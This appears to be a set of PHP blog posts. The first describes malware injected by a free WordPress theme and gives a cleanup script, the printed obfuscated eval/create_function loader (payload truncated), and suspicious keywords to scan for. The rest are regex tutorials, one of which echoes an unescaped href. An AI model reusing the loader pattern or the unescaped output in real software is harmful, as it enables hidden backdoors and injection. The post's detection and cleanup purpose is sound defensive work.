I would not have had any issues if they added a few links back to their site for providing this theme for free but the buggers injected the malicious code in all the PHP files on my server, driving me nuts. Thank God, it was all in the same pattern making it easy for me to clean them using a script.

Now,  how to scan for this malicious script and clean it?

Here is the script I wrote to clean the malicious code from all the PHP files on the server. Copy the below code to a file and put it in your root folder in your server and run it. I am sure most of the free themes from the above mentioned sites would have the malicious code in the same format. I’ll try to add more patterns to this script as you or I come across the others.

<?php
set_time_limit(0);
$di = new RecursiveDirectoryIterator(getcwd());
foreach (new RecursiveIteratorIterator($di) as $filename => $file) {
	$path = pathinfo($filename);
	if('php' == strtolower($path['extension'])) {
		$content = file_get_contents($filename);
		$replaced = preg_replace('/\<\?php[.\r\n\t\s]*\$md5[.\r\n\t\s]*([^<]+)*/', '', $content);
		if($content != $replaced) {
			file_put_contents($filename, $replaced);
			echo 'Cleaned ' . $filename . '<br/>';
		}
	}
}
?>

The malicious code in the theme I installed looked like this:

<?php
$md5 = "f87975b5d07349ceb2073f410800d343";
$wp_salt = array(';',"n",'t',")","v",'_','e','o',"l",'r',"g",'i','s',"6","a",'b','4',"$",'c','z','d',"f","(");
$wp_add_filter = create_function('$'.'v',$wp_salt[6].$wp_salt[4].$wp_salt[14].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[19].$wp_salt[11].$wp_salt[1].$wp_salt[21].$wp_salt[8].$wp_salt[14].$wp_salt[2].$wp_salt[6].$wp_salt[22].$wp_salt[15].$wp_salt[14].$wp_salt[12].$wp_salt[6].$wp_salt[13].$wp_salt[16].$wp_salt[5].$wp_salt[20].$wp_salt[6].$wp_salt[18].$wp_salt[7].$wp_salt[20].$wp_salt[6].$wp_salt[22].$wp_salt[17].$wp_salt[4].$wp_salt[3].$wp_salt[3].$wp_salt[3].$wp_salt[0]);
$wp_add_filter('FZfFzobalkUf........Huge Junk Code Here......obalkU');
?>

There is an excellent post telling you why you should use themes only from WordPress.org. Read here: http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/

Before installing any free theme you got from a gallery site, search for terms like ‘md5′, ‘eval’, ‘create_function’, ‘wp_add_filter’, ‘hex’ in your theme source and make sure that they are not malicious code.

You can also install and run the plug-in ‘Exploit Scanner’ to see if you are already hacked. If you see a different pattern for these malicious code, send me the code and I will add the matching patterns for them in my scanner code.

Have Fun!

The PHP function preg_grep handles this beautifully. It accepts the Regex pattern and the array to search for as its parameters. It then returns the array consisting of the elements of the input array that match the given pattern. The returned array is indexed using the keys from the input array.

Here is my array:
Array
(
[0] => Armenia
[1] => America
[2] => Algeria
[3] => India
[4] => Brazil
[5] => Croatia
[6] => Denmark
)
I want to find all the countries in the array which start with the letter ‘A’. We need to form a regular expression which will match all the strings starting with letter A.

I have got this simple regular expression: ‘/^A.*/’

Now here is the PHP code to find the values from the Array.

<?php
$array = array('Armenia', 'America', 'Algeria', 'India', 'Brazil', 'Croatia', 'Denmark');
$fl_array = preg_grep('/^A.*/', $array);
echo '<pre>';
print_r($fl_array);
echo '</pre>';
?>

Which then gives you this output:
Array
(
[0] => Armenia
[1] => America
[2] => Algeria
)

Here are some Regular Expression Patterns you could use.

Find whole numbers: ‘/^\d+$/’
Floating numbers: ‘/^\d+\.{1}\d+$/’
Lowercase Words: ‘/^[a-z]+$/’

Play with Regular Expressions and let me know if you have any questions or if you need more patterns. I am planning to publish an article on Regular Expressions soon.

OK. Let’s now try a small example. Let’s try to find the URL defined in the HREF attribute and the Link Text in all the tags present in an HTML string.

This is the HTML we have:

<html>
<body>
<a href=”http://www.google.com”>Google</a>
<a href=”http://www.yahoo.com”>Yahoo</a>
</body>
</html>

We will now find the href value and the link text in the above html code. So we are expecting an output like this.

http://www.google.com – Google
http://www.yahoo.com – Yahoo

Here is the Regular Expression for this.

preg_match_all("/\<a.*href=\"(.*?)\".*?\>(.*)\<\/a\>+/", $yourhtmlstring, $matches, PREG_SET_ORDER);

PREG_SET_ORDER is used order results so that $matches[0] is an array of first set of matches, $matches[1] is an array of second set of matches, and so on.

All the matchings found will be returned in the $matches array. Let’s see the content of the $matches array.

Array
(
    [0] => Array
        (
            [0] => Google
            [1] => http://www.google.com
            [2] => Google
        )
    [1] => Array
        (
            [0] => Yahoo
            [1] => http://www.yahoo.com
            [2] => Yahoo
        )
)

A simple script for you to try:

<?php
if(count($_POST)) {
	preg_match_all("/\<a.*href=\"(.*?)\".*?\>(.*)\<\/a\>+/", stripslashes($_POST['data']), $matches, PREG_SET_ORDER);
	foreach($matches as $key=>$match) {
		echo htmlentities($match[2]).' : '.$match[1]."<br/>";
	}
}
?>
<br/>
<br/>
<form action="" enctype="multipart/form-data" method="post">
<textarea name="data" rows="10" cols="100"></textarea><br>
<input type="submit" name="submit"/>
</form>

This script when run shows a text area where you can paste your html code with <a> tags in it. Submit the form and you can see the links extracted.

More articles on Regular Expression coming soon!

Enjoy!